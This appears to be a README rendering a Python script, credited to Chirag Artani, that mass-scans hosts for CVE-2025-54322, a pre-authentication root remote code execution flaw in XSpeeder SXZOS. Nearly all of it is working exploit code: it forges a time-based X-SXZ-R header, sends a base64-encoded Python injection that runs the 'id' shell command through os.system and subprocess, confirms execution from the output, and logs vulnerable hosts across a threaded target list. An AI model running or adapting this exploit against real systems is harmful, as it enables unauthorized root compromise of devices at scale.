README.md
Rendering markdown...
#!/usr/bin/env python3
import requests
import sys
import time
import re
import urllib3
from base64 import b64encode
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import HTTPAdapter
from urllib3.exceptions import InsecureRequestWarning as URLLib3InsecureWarning
from concurrent.futures import ThreadPoolExecutor, as_completed
from threading import Lock
#By Chirag Artani
# Disable all SSL warnings
urllib3.disable_warnings(URLLib3InsecureWarning)
urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Thread-safe locks
print_lock = Lock()
file_lock = Lock()
def safe_print(message):
"""Thread-safe printing"""
with print_lock:
print(message)
def write_vulnerable(url, output, status):
"""Thread-safe file writing for vulnerable hosts"""
with file_lock:
with open('vuln-confirm.txt', 'a') as f:
f.write(f"{url}\n")
f.write(f"Status: {status}\n")
f.write(f"Output: {output}\n")
f.write("-"*70 + "\n")
class SSLAdapter(HTTPAdapter):
"""Custom adapter to handle SSL issues"""
def init_poolmanager(self, *args, **kwargs):
kwargs['ssl_version'] = urllib3.util.ssl_.PROTOCOL_TLS
kwargs['cert_reqs'] = 'CERT_NONE'
kwargs['assert_hostname'] = False
return super().init_poolmanager(*args, **kwargs)
class XspeederScanner:
def __init__(self, target_url, max_retries=2, thread_id=None):
self.target_url = target_url.rstrip('/')
self.max_retries = max_retries
self.thread_id = thread_id
self.session = self._create_session()
# Regex to match uid/gid output from 'id' command
self.id_regex = re.compile(r'uid=\d+\([a-zA-Z0-9_-]+\)\s+gid=\d+\([a-zA-Z0-9_-]+\)')
def _create_session(self):
"""Create a requests session with SSL bypass"""
session = requests.Session()
# Mount custom SSL adapter for both HTTP and HTTPS
adapter = SSLAdapter()
session.mount('http://', adapter)
session.mount('https://', adapter)
# Set default headers
session.headers.update({
'Connection': 'close',
'Accept': '*/*'
})
return session
def build_payload(self):
"""Build the exploit payload with 'id' command - MATCHING ORIGINAL"""
cmd = 'id'
# Use os.system() like original PoC, but capture output
payload = f'__import__("os").system("{cmd}") or __import__("subprocess").check_output("{cmd}", shell=True).decode() #sUserCodexsPwd'
encoded_payload = b64encode(payload.encode()).decode("utf-8")
return encoded_payload
def calculate_nonce(self):
"""Calculate the time-based nonce for X-SXZ-R header"""
return str(int(time.time() / 60) % 7)
def warm_session(self, headers):
"""Warm up the session - MATCHING ORIGINAL (no validation)"""
try:
warmup_url = f"{self.target_url}/webInfos/"
self.session.get(
warmup_url,
headers=headers,
verify=False,
timeout=20,
allow_redirects=True
)
return True
except requests.exceptions.Timeout:
return True
except Exception:
return False
def send_exploit(self, headers, payload):
"""Send the actual exploit request"""
try:
exploit_url = f"{self.target_url}/?title=ABC&oIp=XXX&chkid={payload}"
response = self.session.get(
exploit_url,
headers=headers,
verify=False,
timeout=20,
allow_redirects=False
)
return response
except Exception:
return None
def check_vulnerability(self):
"""Main function to check if target is vulnerable"""
for attempt in range(1, self.max_retries + 1):
try:
# Calculate fresh nonce for each attempt
nonce = self.calculate_nonce()
headers = {
'User-Agent': 'SXZ/2.3',
'X-SXZ-R': nonce,
'Accept': '*/*'
}
# Step 1: Warm up session
if not self.warm_session(headers):
if attempt < self.max_retries:
time.sleep(1)
continue
return {
'vulnerable': False,
'status': 'Connection completely failed',
'output': None
}
# Small delay between requests
time.sleep(0.3)
# Step 2: Send exploit
payload = self.build_payload()
response = self.send_exploit(headers, payload)
if response is None:
if attempt < self.max_retries:
time.sleep(1)
continue
return {
'vulnerable': False,
'status': 'Exploit delivery failed',
'output': None
}
# Check response for 'id' command output
response_text = response.text
# Look for uid/gid pattern in response
id_match = self.id_regex.search(response_text)
if id_match:
return {
'vulnerable': True,
'status': 'VULNERABLE - RCE Confirmed',
'output': id_match.group(0),
'status_code': response.status_code,
'full_response': response_text[:500]
}
# Check for other indicators (partial match)
if 'uid=' in response_text or 'gid=' in response_text:
return {
'vulnerable': True,
'status': 'LIKELY VULNERABLE - Partial match',
'output': response_text[:200],
'status_code': response.status_code
}
# Check for error indicators that suggest code execution
execution_indicators = [
'CalledProcessError',
'subprocess',
'Traceback',
'NameError',
'SyntaxError',
'eval'
]
if any(indicator in response_text for indicator in execution_indicators):
return {
'vulnerable': True,
'status': 'POTENTIALLY VULNERABLE - Code execution indicators found',
'output': response_text[:300],
'status_code': response.status_code
}
# If no match and we have retries left, try again
if attempt < self.max_retries:
time.sleep(1)
continue
return {
'vulnerable': False,
'status': 'Not vulnerable',
'output': None,
'status_code': response.status_code
}
except Exception as e:
if attempt < self.max_retries:
time.sleep(1)
continue
return {
'vulnerable': False,
'status': f'Error: {str(e)[:100]}',
'output': None
}
return {
'vulnerable': False,
'status': 'Max retries exceeded',
'output': None
}
def load_targets(filename):
"""Load targets from file"""
try:
with open(filename, 'r') as f:
targets = [line.strip() for line in f if line.strip() and not line.startswith('#')]
return targets
except FileNotFoundError:
print(f"[-] Error: File '{filename}' not found")
sys.exit(1)
except Exception as e:
print(f"[-] Error reading file: {e}")
sys.exit(1)
def scan_target(target, thread_id):
"""Scan a single target (thread worker function)"""
scanner = XspeederScanner(target, max_retries=2, thread_id=thread_id)
result = scanner.check_vulnerability()
return target, result
def print_vulnerable(target, result):
"""Print only vulnerable results (thread-safe)"""
output = []
output.append(f"\n{'='*70}")
output.append(f"[+] VULNERABLE: {target}")
output.append(f"[+] Status: {result['status']}")
if 'status_code' in result:
output.append(f"[+] HTTP Status: {result['status_code']}")
output.append(f"[+] Output: {result['output']}")
output.append(f"{'='*70}\n")
safe_print('\n'.join(output))
def main():
banner = """
╔═══════════════════════════════════════════════════════════════╗
║ XSpeeder SXZOS (CVE-2025-54322) RCE Scanner ║
║ Pre-Auth Root RCE Vulnerability Checker ║
║ Showing: VULNERABLE HOSTS ONLY ║
╚═══════════════════════════════════════════════════════════════╝
"""
print(banner)
if len(sys.argv) < 2 or len(sys.argv) > 3:
print("[-] Usage: python3 scanner.py <targets_file> [threads]")
print("[-] Example: python3 scanner.py targets.txt 20")
print("[-] Default threads: 10")
sys.exit(1)
targets_file = sys.argv[1]
max_threads = int(sys.argv[2]) if len(sys.argv) == 3 else 10
# Validate thread count
if max_threads < 1 or max_threads > 50:
print("[-] Thread count must be between 1 and 50")
sys.exit(1)
targets = load_targets(targets_file)
# Clear the output file
with open('vuln-confirm.txt', 'w') as f:
f.write(f"XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts\n")
f.write(f"Scan started: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
f.write("="*70 + "\n\n")
print(f"[*] Loaded {len(targets)} targets from {targets_file}")
print(f"[*] Using {max_threads} concurrent threads")
print(f"[*] Vulnerable hosts will be saved to: vuln-confirm.txt")
print(f"[*] Starting scan...\n")
vulnerable_count = 0
processed = 0
start_time = time.time()
# Threading with ThreadPoolExecutor
with ThreadPoolExecutor(max_workers=max_threads) as executor:
# Submit all tasks
future_to_target = {
executor.submit(scan_target, target, i): target
for i, target in enumerate(targets, 1)
}
try:
# Process completed tasks
for future in as_completed(future_to_target):
target = future_to_target[future]
processed += 1
try:
target_url, result = future.result()
# Only print and save if vulnerable
if result['vulnerable']:
vulnerable_count += 1
print_vulnerable(target_url, result)
write_vulnerable(target_url, result['output'], result['status'])
# Print progress every 50 hosts
if processed % 50 == 0:
safe_print(f"[*] Progress: {processed}/{len(targets)} | Found: {vulnerable_count} vulnerable")
except Exception as e:
safe_print(f"[!] Error processing {target}: {e}")
except KeyboardInterrupt:
safe_print("\n\n[!] Scan interrupted by user. Waiting for active threads to finish...")
executor.shutdown(wait=True)
elapsed_time = time.time() - start_time
# Final Summary
print(f"\n{'='*70}")
print(f"[*] SCAN COMPLETE")
print(f"{'='*70}")
print(f"[*] Total Time: {elapsed_time:.2f} seconds")
print(f"[*] Total Targets Scanned: {len(targets)}")
print(f"[*] Vulnerable Hosts Found: {vulnerable_count}")
print(f"[*] Success Rate: {(vulnerable_count/len(targets)*100):.2f}%")
print(f"[*] Average Time per Target: {elapsed_time/len(targets):.2f} seconds")
print(f"{'='*70}\n")
if vulnerable_count > 0:
print(f"[+] All vulnerable hosts saved to: vuln-confirm.txt")
print(f"[+] Total vulnerable: {vulnerable_count}/{len(targets)}")
else:
print(f"[-] No vulnerable hosts found")
# Append summary to file
with open('vuln-confirm.txt', 'a') as f:
f.write("\n" + "="*70 + "\n")
f.write(f"Scan completed: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
f.write(f"Total scanned: {len(targets)}\n")
f.write(f"Vulnerable: {vulnerable_count}\n")
f.write(f"Time taken: {elapsed_time:.2f} seconds\n")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\n\n[!] Script terminated by user")
sys.exit(0)
except Exception as e:
print(f"\n[!] Fatal error: {e}")
sys.exit(1)